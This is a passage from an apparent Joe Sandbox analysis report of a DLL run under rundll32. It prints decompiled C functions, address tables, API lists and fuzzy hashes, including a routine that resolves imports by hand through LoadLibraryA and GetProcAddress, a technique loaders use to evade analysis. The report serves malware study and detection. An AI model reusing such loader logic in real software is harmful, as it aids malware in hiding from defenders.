                                                                                                                                                                          						if((_v5 & 0x000000ff) != 3) {
                                                                                                                                                                          							if((_v5 & 0x000000ff) == 0xa) {
                                                                                                                                                                          								 *_v48 =  *_v48 + _v64;
                                                                                                                                                                          							}
                                                                                                                                                                          						} else {
                                                                                                                                                                          							 *_v48 =  *_v48 + _v64;
                                                                                                                                                                          						}
                                                                                                                                                                          						_v32 =  &(_v32[1]);
                                                                                                                                                                          					}
                                                                                                                                                                          					_v52 = _v32;
                                                                                                                                                                          				}
                                                                                                                                                                          				goto L13;
                                                                                                                                                                          			}









































                                                                                                                                                                          0x10014733
                                                                                                                                                                          0x10014740
                                                                                                                                                                          0x10014746
                                                                                                                                                                          0x1001474f
                                                                                                                                                                          0x10014752
                                                                                                                                                                          0x10014755
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10014846
                                                                                                                                                                          0x1001484a
                                                                                                                                                                          0x1001484c
                                                                                                                                                                          0x1001485a
                                                                                                                                                                          0x10014978
                                                                                                                                                                          0x1001497c
                                                                                                                                                                          0x10014a44
                                                                                                                                                                          0x10014a4d
                                                                                                                                                                          0x10014a50
                                                                                                                                                                          0x10014a54
                                                                                                                                                                          0x10014a5a
                                                                                                                                                                          0x10014a62
                                                                                                                                                                          0x10014a62
                                                                                                                                                                          0x10014a6a
                                                                                                                                                                          0x10014a80
                                                                                                                                                                          0x10014a93
                                                                                                                                                                          0x10014a96
                                                                                                                                                                          0x10014a9a
                                                                                                                                                                          0x10014aa0
                                                                                                                                                                          0x10014ab0
                                                                                                                                                                          0x10014adb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10014add
                                                                                                                                                                          0x10014ab6
                                                                                                                                                                          0x10014ac7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10014ad5
                                                                                                                                                                          0x10014ad9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10014ad5
                                                                                                                                                                          0x10014ac9
                                                                                                                                                                          0x10014acd
                                                                                                                                                                          0x10014ad2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10014ad2
                                                                                                                                                                          0x10014ab8
                                                                                                                                                                          0x10014abc
                                                                                                                                                                          0x10014abe
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10014abe
                                                                                                                                                                          0x10014aa2
                                                                                                                                                                          0x10014aa6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10014aa8
                                                                                                                                                                          0x10014982
                                                                                                                                                                          0x10014986
                                                                                                                                                                          0x10014988
                                                                                                                                                                          0x10014996
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001499c
                                                                                                                                                                          0x100149a5
                                                                                                                                                                          0x100149b3
                                                                                                                                                                          0x100149bf
                                                                                                                                                                          0x100149cb
                                                                                                                                                                          0x100149d4
                                                                                                                                                                          0x100149d7
                                                                                                                                                                          0x100149db
                                                                                                                                                                          0x100149dd
                                                                                                                                                                          0x100149ea
                                                                                                                                                                          0x100149fe
                                                                                                                                                                          0x10014a0d
                                                                                                                                                                          0x10014a1e
                                                                                                                                                                          0x100149e7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x100149e7
                                                                                                                                                                          0x10014a20
                                                                                                                                                                          0x10014a24
                                                                                                                                                                          0x10014a29
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10014a29
                                                                                                                                                                          0x10014a34
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10014a36
                                                                                                                                                                          0x10014a3a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10014a3c
                                                                                                                                                                          0x10014860
                                                                                                                                                                          0x10014869
                                                                                                                                                                          0x10014877
                                                                                                                                                                          0x1001487a
                                                                                                                                                                          0x10014897
                                                                                                                                                                          0x1001489e
                                                                                                                                                                          0x100148b0
                                                                                                                                                                          0x100148b0
                                                                                                                                                                          0x100148b7
                                                                                                                                                                          0x100148c7
                                                                                                                                                                          0x100148df
                                                                                                                                                                          0x100148c9
                                                                                                                                                                          0x100148d1
                                                                                                                                                                          0x100148d1
                                                                                                                                                                          0x100148e2
                                                                                                                                                                          0x100148e6
                                                                                                                                                                          0x100148f6
                                                                                                                                                                          0x10014919
                                                                                                                                                                          0x1001492b
                                                                                                                                                                          0x100148f8
                                                                                                                                                                          0x1001490c
                                                                                                                                                                          0x1001490c
                                                                                                                                                                          0x10014935
                                                                                                                                                                          0x10014951
                                                                                                                                                                          0x10014937
                                                                                                                                                                          0x10014946
                                                                                                                                                                          0x10014946
                                                                                                                                                                          0x10014959
                                                                                                                                                                          0x10014962
                                                                                                                                                                          0x10014962
                                                                                                                                                                          0x10014970
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x100148b9
                                                                                                                                                                          0x100148bb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x100148bb
                                                                                                                                                                          0x100148b7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001487a
                                                                                                                                                                          0x1001475d
                                                                                                                                                                          0x1001476b
                                                                                                                                                                          0x10014770
                                                                                                                                                                          0x1001477b
                                                                                                                                                                          0x1001477e
                                                                                                                                                                          0x10014782
                                                                                                                                                                          0x10014784
                                                                                                                                                                          0x10014794
                                                                                                                                                                          0x1001479d
                                                                                                                                                                          0x100147a6
                                                                                                                                                                          0x100147ae
                                                                                                                                                                          0x100147b7
                                                                                                                                                                          0x100147c2
                                                                                                                                                                          0x100147c8
                                                                                                                                                                          0x100147cb
                                                                                                                                                                          0x100147ce
                                                                                                                                                                          0x100147d5
                                                                                                                                                                          0x100147dc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x100147e7
                                                                                                                                                                          0x100147f5
                                                                                                                                                                          0x10014800
                                                                                                                                                                          0x1001480a
                                                                                                                                                                          0x10014822
                                                                                                                                                                          0x1001482f
                                                                                                                                                                          0x1001482f
                                                                                                                                                                          0x1001480c
                                                                                                                                                                          0x10014817
                                                                                                                                                                          0x10014817
                                                                                                                                                                          0x10014836
                                                                                                                                                                          0x10014836
                                                                                                                                                                          0x1001483e
                                                                                                                                                                          0x1001483e
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 10014891
                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000), ref: 100148AA
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 10014906
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 10014925
                                                                                                                                                                          • lstrcmpA.KERNEL32(?,00000000), ref: 10014A16
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 10014A73
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$CurrentHandleLibraryLoadModuleProcesslstrcmp
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2598995400-0
                                                                                                                                                                          • Opcode ID: 2177c1f24ff3cde81dc3cba8acccce6a4d6644a7936ee6e42606d82185f5fa6b
                                                                                                                                                                          • Instruction ID: 8ce2545dcfdf1b075962a8eadafe5cd5c258ebc8f2810bbd0a540e449d7a2533
                                                                                                                                                                          • Opcode Fuzzy Hash: 2177c1f24ff3cde81dc3cba8acccce6a4d6644a7936ee6e42606d82185f5fa6b
                                                                                                                                                                          • Instruction Fuzzy Hash: 8CE1A074E00209DFDB50CFA8C880AADBBF1FF08354F628569E815AB361DB34E991CB55
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 1000D3EB
                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 1000D3F3
                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 1000D407
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 1000D482
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 1000D485
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 1000D48A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String$AllocFree
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 344208780-0
                                                                                                                                                                          • Opcode ID: 0d28ba521176732a0c5d5810ff6faa4146b34a4da917b14d726958c1f513da72
                                                                                                                                                                          • Instruction ID: 961eb39602c70f2a203f5431f7acb9ec6646a0a5302c4a3dd4ac3c3d43dc5e55
                                                                                                                                                                          • Opcode Fuzzy Hash: 0d28ba521176732a0c5d5810ff6faa4146b34a4da917b14d726958c1f513da72
                                                                                                                                                                          • Instruction Fuzzy Hash: 6E212CB5A00219BFDB00DFA4CC88C9FBBBDEF49294B10449AF505E7250D771AE45CB60
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: @$\u%04X$\u%04X\u%04X
                                                                                                                                                                          • API String ID: 0-2132903582
                                                                                                                                                                          • Opcode ID: 493483fb906f91a0434a20b66ccdc4e1535a435bead09ed2833b61867c36d1d8
                                                                                                                                                                          • Instruction ID: eb18ba607d7dd9a04e403e711ed86a94d3658e1d124d9acdc96c7653c83a5569
                                                                                                                                                                          • Opcode Fuzzy Hash: 493483fb906f91a0434a20b66ccdc4e1535a435bead09ed2833b61867c36d1d8
                                                                                                                                                                          • Instruction Fuzzy Hash: 3641F8F1A00146BBDF24CEA89C95ABF3BD5EF0A258F200525FD16DE240D679CEF09291
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                          			E10013CE2(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                                                                                                                                                                          				signed int _t12;
                                                                                                                                                                          				signed int _t13;
                                                                                                                                                                          				signed int _t23;
                                                                                                                                                                          				void* _t30;
                                                                                                                                                                          				char* _t31;
                                                                                                                                                                          				char* _t33;
                                                                                                                                                                          				char* _t35;
                                                                                                                                                                          				char* _t37;
                                                                                                                                                                          				char* _t38;
                                                                                                                                                                          				long long* _t40;
                                                                                                                                                                          
                                                                                                                                                                          				_t30 = __edi;
                                                                                                                                                                          				_t12 = _a20;
                                                                                                                                                                          				if(_t12 == 0) {
                                                                                                                                                                          					_t12 = 0x11;
                                                                                                                                                                          				}
                                                                                                                                                                          				_t35 = _a4;
                                                                                                                                                                          				_push(_t25);
                                                                                                                                                                          				 *_t40 = _a12;
                                                                                                                                                                          				_push(_t12);
                                                                                                                                                                          				_push("%.*g");
                                                                                                                                                                          				_push(_a8);
                                                                                                                                                                          				_push(_t35);
                                                                                                                                                                          				L10013E3B();
                                                                                                                                                                          				_t23 = _t12;
                                                                                                                                                                          				if(_t23 < 0 || _t23 >= _a8) {
                                                                                                                                                                          					L16:
                                                                                                                                                                          					_t13 = _t12 | 0xffffffff;
                                                                                                                                                                          					goto L17;
                                                                                                                                                                          				} else {
                                                                                                                                                                          					E10013CBB(_t12, _t35);
                                                                                                                                                                          					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
                                                                                                                                                                          						L8:
                                                                                                                                                                          						_push(_t30);
                                                                                                                                                                          						_t37 = strchr(_t35, 0x65);
                                                                                                                                                                          						_t31 = _t37;
                                                                                                                                                                          						if(_t37 == 0) {
                                                                                                                                                                          							L15:
                                                                                                                                                                          							_t13 = _t23;
                                                                                                                                                                          							L17:
                                                                                                                                                                          							return _t13;
                                                                                                                                                                          						}
                                                                                                                                                                          						_t38 = _t37 + 1;
                                                                                                                                                                          						_t33 = _t31 + 2;
                                                                                                                                                                          						if( *_t38 == 0x2d) {
                                                                                                                                                                          							_t38 = _t33;
                                                                                                                                                                          						}
                                                                                                                                                                          						while( *_t33 == 0x30) {
                                                                                                                                                                          							_t33 = _t33 + 1;
                                                                                                                                                                          						}
                                                                                                                                                                          						if(_t33 != _t38) {
                                                                                                                                                                          							E100092EF(_t38, _t33, _t23 - _t33 + _a4);
                                                                                                                                                                          							_t23 = _t23 + _t38 - _t33;
                                                                                                                                                                          						}
                                                                                                                                                                          						goto L15;
                                                                                                                                                                          					} else {
                                                                                                                                                                          						_t6 = _t23 + 3; // 0x100124cd
                                                                                                                                                                          						_t12 = _t6;
                                                                                                                                                                          						if(_t12 >= _a8) {
                                                                                                                                                                          							goto L16;
                                                                                                                                                                          						}
                                                                                                                                                                          						_t35[_t23] = 0x302e;
                                                                                                                                                                          						( &(_t35[2]))[_t23] = 0;
                                                                                                                                                                          						_t23 = _t23 + 2;
                                                                                                                                                                          						goto L8;
                                                                                                                                                                          					}
                                                                                                                                                                          				}
                                                                                                                                                                          			}













                                                                                                                                                                          0x10013ce2
                                                                                                                                                                          0x10013ce5
                                                                                                                                                                          0x10013cea
                                                                                                                                                                          0x10013cee
                                                                                                                                                                          0x10013cee
                                                                                                                                                                          0x10013cf4
                                                                                                                                                                          0x10013cf8
                                                                                                                                                                          0x10013cf9
                                                                                                                                                                          0x10013cfc
                                                                                                                                                                          0x10013cfd
                                                                                                                                                                          0x10013d02
                                                                                                                                                                          0x10013d05
                                                                                                                                                                          0x10013d06
                                                                                                                                                                          0x10013d0b
                                                                                                                                                                          0x10013d12
                                                                                                                                                                          0x10013d9b
                                                                                                                                                                          0x10013d9b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10013d1d
                                                                                                                                                                          0x10013d1e
                                                                                                                                                                          0x10013d30
                                                                                                                                                                          0x10013d56
                                                                                                                                                                          0x10013d56
                                                                                                                                                                          0x10013d5f
                                                                                                                                                                          0x10013d61
                                                                                                                                                                          0x10013d67
                                                                                                                                                                          0x10013d96
                                                                                                                                                                          0x10013d96
                                                                                                                                                                          0x10013d9e
                                                                                                                                                                          0x10013da1
                                                                                                                                                                          0x10013da1
                                                                                                                                                                          0x10013d69
                                                                                                                                                                          0x10013d6a
                                                                                                                                                                          0x10013d70
                                                                                                                                                                          0x10013d72
                                                                                                                                                                          0x10013d72
                                                                                                                                                                          0x10013d77
                                                                                                                                                                          0x10013d76
                                                                                                                                                                          0x10013d76
                                                                                                                                                                          0x10013d7e
                                                                                                                                                                          0x10013d8a
                                                                                                                                                                          0x10013d94
                                                                                                                                                                          0x10013d94
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10013d40
                                                                                                                                                                          0x10013d40
                                                                                                                                                                          0x10013d40
                                                                                                                                                                          0x10013d46
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10013d48
                                                                                                                                                                          0x10013d4e
                                                                                                                                                                          0x10013d53
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10013d53
                                                                                                                                                                          0x10013d30

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: strchr$_snprintf
                                                                                                                                                                          • String ID: %.*g
                                                                                                                                                                          • API String ID: 3619936089-952554281
                                                                                                                                                                          • Opcode ID: 286a288ee1548feab581ae243e4d75e912d28c7f784a30c9e4bd429eae58ea52
                                                                                                                                                                          • Instruction ID: a0cb154953dd0ca0f53bbf6e7323fc8ff70a8177b6082b7344b2c0a88ec657ea
                                                                                                                                                                          • Opcode Fuzzy Hash: 286a288ee1548feab581ae243e4d75e912d28c7f784a30c9e4bd429eae58ea52
                                                                                                                                                                          • Instruction Fuzzy Hash: 2221E436604B5626E721CA18FC8AF9E37D8DF012A8F16C125FD449E181E771EDC183D1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                          			E10013E83(signed int __eax, void* __ecx, intOrPtr _a4) {
                                                                                                                                                                          				intOrPtr* _v8;
                                                                                                                                                                          				signed int* _v12;
                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                          				struct HINSTANCE__* _v36;
                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                          				signed int _v44;
                                                                                                                                                                          				struct HINSTANCE__* _v48;
                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                          				signed int _v56;
                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                          				signed int _v64;
                                                                                                                                                                          				signed int _t109;
                                                                                                                                                                          				signed int _t112;
                                                                                                                                                                          				signed int _t115;
                                                                                                                                                                          				void* _t163;
                                                                                                                                                                          				void* _t167;
                                                                                                                                                                          
                                                                                                                                                                          				_t167 = __ecx;
                                                                                                                                                                          				_v44 = _v44 & 0x00000000;
                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                          					_v48 = GetModuleHandleA("kernel32.dll");
                                                                                                                                                                          					_v40 = E100094A4(_t167, _v48, "GetProcAddress");
                                                                                                                                                                          					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                                                                                                                          					_v32 = _v52;
                                                                                                                                                                          					_t109 = 8;
                                                                                                                                                                          					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                                                                                                                                                                          						L24:
                                                                                                                                                                          						return 0;
                                                                                                                                                                          					}
                                                                                                                                                                          					_v56 = 0x80000000;
                                                                                                                                                                          					_t112 = 8;
                                                                                                                                                                          					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                                                                                                                                                                          					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                          						_v8 = _v8 + 0x14;
                                                                                                                                                                          					}
                                                                                                                                                                          					_t115 = 8;
                                                                                                                                                                          					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                                                                                                                                                                          					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                          						_t34 = _v8 + 0xc; // 0xffff
                                                                                                                                                                          						_v36 = LoadLibraryA( *_t34 + _a4);
                                                                                                                                                                          						if(_v36 != 0) {
                                                                                                                                                                          							if( *_v8 == 0) {
                                                                                                                                                                          								_t43 = _v8 + 0x10; // 0xb8
                                                                                                                                                                          								_v12 =  *_t43 + _a4;
                                                                                                                                                                          							} else {
                                                                                                                                                                          								_v12 =  *_v8 + _a4;
                                                                                                                                                                          							}
                                                                                                                                                                          							_v28 = _v28 & 0x00000000;
                                                                                                                                                                          							while( *_v12 != 0) {
                                                                                                                                                                          								_v24 = _v24 & 0x00000000;
                                                                                                                                                                          								_v16 = _v16 & 0x00000000;
                                                                                                                                                                          								_v64 = _v64 & 0x00000000;
                                                                                                                                                                          								_v20 = _v20 & 0x00000000;
                                                                                                                                                                          								if(( *_v12 & _v56) == 0) {
                                                                                                                                                                          									_v60 =  *_v12 + _a4;
                                                                                                                                                                          									_v20 = _v60 + 2;
                                                                                                                                                                          									_t73 = _v8 + 0x10; // 0xb8
                                                                                                                                                                          									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
                                                                                                                                                                          									_v16 = _v40(_v36, _v20);
                                                                                                                                                                          								} else {
                                                                                                                                                                          									_v24 =  *_v12;
                                                                                                                                                                          									_v20 = _v24 & 0x0000ffff;
                                                                                                                                                                          									_v16 = _v40(_v36, _v20);
                                                                                                                                                                          								}
                                                                                                                                                                          								if(_v24 != _v16) {
                                                                                                                                                                          									_v44 = _v44 + 1;
                                                                                                                                                                          									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                                                                                                                                                                          										 *_v12 = _v16;
                                                                                                                                                                          									} else {
                                                                                                                                                                          										_t89 = _v8 + 0x10; // 0xb8
                                                                                                                                                                          										 *( *_t89 + _a4 + _v28) = _v16;
                                                                                                                                                                          									}
                                                                                                                                                                          								}
                                                                                                                                                                          								_v12 =  &(_v12[1]);
                                                                                                                                                                          								_v28 = _v28 + 4;
                                                                                                                                                                          							}
                                                                                                                                                                          							_v8 = _v8 + 0x14;
                                                                                                                                                                          							continue;
                                                                                                                                                                          						}
                                                                                                                                                                          						_t163 = 0xfffffffd;
                                                                                                                                                                          						return _t163;
                                                                                                                                                                          					}
                                                                                                                                                                          					goto L24;
                                                                                                                                                                          				}
                                                                                                                                                                          				return __eax | 0xffffffff;
                                                                                                                                                                          			}























                                                                                                                                                                          0x10013e83
                                                                                                                                                                          0x10013e89
                                                                                                                                                                          0x10013e91
                                                                                                                                                                          0x10013ea6
                                                                                                                                                                          0x10013eb8
                                                                                                                                                                          0x10013ec4
                                                                                                                                                                          0x10013eca
                                                                                                                                                                          0x10013ecf
                                                                                                                                                                          0x10013edb
                                                                                                                                                                          0x10014046
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10014046
                                                                                                                                                                          0x10013ee1
                                                                                                                                                                          0x10013eea
                                                                                                                                                                          0x10013ef8
                                                                                                                                                                          0x10013efb
                                                                                                                                                                          0x10013f0a
                                                                                                                                                                          0x10013f0a
                                                                                                                                                                          0x10013f11
                                                                                                                                                                          0x10013f1f
                                                                                                                                                                          0x10013f22
                                                                                                                                                                          0x10013f32
                                                                                                                                                                          0x10013f3f
                                                                                                                                                                          0x10013f46
                                                                                                                                                                          0x10013f56
                                                                                                                                                                          0x10013f68
                                                                                                                                                                          0x10013f6e
                                                                                                                                                                          0x10013f58
                                                                                                                                                                          0x10013f60
                                                                                                                                                                          0x10013f60
                                                                                                                                                                          0x10013f71
                                                                                                                                                                          0x10013f75
                                                                                                                                                                          0x10013f81
                                                                                                                                                                          0x10013f85
                                                                                                                                                                          0x10013f89
                                                                                                                                                                          0x10013f8d
                                                                                                                                                                          0x10013f99
                                                                                                                                                                          0x10013fc4
                                                                                                                                                                          0x10013fcc
                                                                                                                                                                          0x10013fd2
                                                                                                                                                                          0x10013fde
                                                                                                                                                                          0x10013fea
                                                                                                                                                                          0x10013f9b
                                                                                                                                                                          0x10013fa0
                                                                                                                                                                          0x10013fab
                                                                                                                                                                          0x10013fb7
                                                                                                                                                                          0x10013fb7
                                                                                                                                                                          0x10013ff3
                                                                                                                                                                          0x10013ff9
                                                                                                                                                                          0x10014003
                                                                                                                                                                          0x1001401f
                                                                                                                                                                          0x10014005
                                                                                                                                                                          0x10014008
                                                                                                                                                                          0x10014014
                                                                                                                                                                          0x10014014
                                                                                                                                                                          0x10014003
                                                                                                                                                                          0x10014027
                                                                                                                                                                          0x10014030
                                                                                                                                                                          0x10014030
                                                                                                                                                                          0x1001403e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001403e
                                                                                                                                                                          0x10013f4a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10013f4a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10013f22
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 10013EA0
                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000), ref: 10013F39
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleLibraryLoadModule
                                                                                                                                                                          • String ID: GetProcAddress$kernel32.dll
                                                                                                                                                                          • API String ID: 4133054770-1584408056
                                                                                                                                                                          • Opcode ID: 88c6ed96c91829df7c342a51efce9276512e3ecae6be753845a2ecd89279e371
                                                                                                                                                                          • Instruction ID: 3f5e57b1250461a42cf01aaecdc59c0111733b1b6bf08b31502ed366e43670da
                                                                                                                                                                          • Opcode Fuzzy Hash: 88c6ed96c91829df7c342a51efce9276512e3ecae6be753845a2ecd89279e371
                                                                                                                                                                          • Instruction Fuzzy Hash: 2B619C75D00209EFDB01CF98C885BADBBF1FF08355F2185A9E915AB2A1D774AA80DF50
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 99%
                                                                                                                                                                          			E10014CE0(int _a4, signed int _a8) {
                                                                                                                                                                          				int _v8;
                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                          				void* __esi;
                                                                                                                                                                          				void* _t137;
                                                                                                                                                                          				signed int _t141;
                                                                                                                                                                          				intOrPtr* _t142;
                                                                                                                                                                          				signed int _t145;
                                                                                                                                                                          				signed int _t146;
                                                                                                                                                                          				intOrPtr _t151;
                                                                                                                                                                          				intOrPtr _t161;
                                                                                                                                                                          				intOrPtr _t162;
                                                                                                                                                                          				intOrPtr _t167;
                                                                                                                                                                          				intOrPtr _t170;
                                                                                                                                                                          				signed int _t172;
                                                                                                                                                                          				intOrPtr _t173;
                                                                                                                                                                          				int _t184;
                                                                                                                                                                          				intOrPtr _t185;
                                                                                                                                                                          				intOrPtr _t188;
                                                                                                                                                                          				signed int _t189;
                                                                                                                                                                          				void* _t195;
                                                                                                                                                                          				int _t202;
                                                                                                                                                                          				int _t208;
                                                                                                                                                                          				intOrPtr _t217;
                                                                                                                                                                          				signed int _t218;
                                                                                                                                                                          				int _t219;
                                                                                                                                                                          				intOrPtr _t220;
                                                                                                                                                                          				signed int _t221;
                                                                                                                                                                          				signed int _t222;
                                                                                                                                                                          				int _t224;
                                                                                                                                                                          				int _t225;
                                                                                                                                                                          				signed int _t227;
                                                                                                                                                                          				intOrPtr _t228;
                                                                                                                                                                          				int _t232;
                                                                                                                                                                          				int _t234;
                                                                                                                                                                          				signed int _t235;
                                                                                                                                                                          				int _t239;
                                                                                                                                                                          				void* _t240;
                                                                                                                                                                          				int _t245;
                                                                                                                                                                          				int _t252;
                                                                                                                                                                          				signed int _t253;
                                                                                                                                                                          				int _t254;
                                                                                                                                                                          				void* _t257;
